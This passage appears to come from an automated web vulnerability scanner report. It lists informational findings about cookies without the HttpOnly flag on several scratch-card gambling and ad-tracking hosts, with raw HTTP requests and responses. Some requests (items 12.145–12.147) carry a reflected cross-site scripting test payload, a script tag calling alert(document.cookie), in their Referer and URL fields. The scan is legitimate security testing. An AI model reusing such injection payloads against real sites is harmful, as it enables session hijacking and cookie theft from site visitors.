Connection: close


12.137. http://nettiarpa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nettiarpa.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nettiarpa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0ndiwi55yv4s1vbj1zkcer45; path=/; HttpOnly
Set-Cookie: CSI_11=EncryptedUniqueVisitorID=9A7D28C5493E17C1FB483D0DFAD36B49&AffiliateID=11&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=nettiarpa.com; expires=Fri, 16-May-2031 11:48:26 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: BO=FM; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: UniqueVisitorID=9A7D28C5493E17C1FB483D0DFAD36B49; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: CSITemp=11; domain=nettiarpa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.138. http://nl.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rdea0n55hhroqxblgqaveqye; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:30 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: UniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.139. http://nl.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q2caq0iw5kh0ygn1y3sdtjya; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:19 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: UniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.140. http://nl.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=of4xfwah3rgoyu55lp4wc355; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:09:23 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: UniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.141. http://nl.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c40a2w55f4jphb55iu3y3fjz; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:30 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: UniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.142. http://no.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b2f3co55vtup5rji1vapqb55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:58:56 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: UniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.143. http://no.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=m32wka451cran0zbscse5n55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=522E66105AD1EC714AF629DF19E62306&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: UniqueVisitorID=522E66105AD1EC714AF629DF19E62306; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44871


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.144. http://no.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3mvctbasrautiu55bmexne55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=20914B9EC2030E414402DD35EBA7E838&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:39:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: UniqueVisitorID=20914B9EC2030E414402DD35EBA7E838; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.145. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=41&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 12:51:49 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"2\": 1305550329}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Content-Length: 508

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...

12.146. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=572101393;fpan=u;fpa=;ns=0;url=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ebe96a23f3a3%3D1;ref=http%3A%2F%2Fburp%2Fshow%2F22;ce=1;je=1;sr=1920x1200x24;enc=n;ogl=site_name.Metacafe;dst=1;et=1305550311743;tzo=300;a=p-96ifrWFBpTdiA;media=ad;labels=_imp.adserver.doubleclick%2C_imp.publisher.62878001%2C_imp.placement.239990545%2C_imp.creative.41692150 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EMIBXQHgBoHyDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 16 May 2011 12:51:52 GMT
Server: QS


12.147. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-96ifrWFBpTdiA.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-96ifrWFBpTdiA.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62878001,_imp.placement.239990545,_imp.creative.41692150 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EMIBXQHgBoHyDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 16 May 2011 12:51:52 GMT
Server: QS

GIF89a.......,.................D..;

12.148. http://primescratchcards.com/images/HelpDepositMethods.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.149. http://primescratchcards.com/images/InviteFriend.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.150. http://primescratchcards.com/images/Responsible.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.151. http://primescratchcards.com/images/SecurityAndPrivacy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
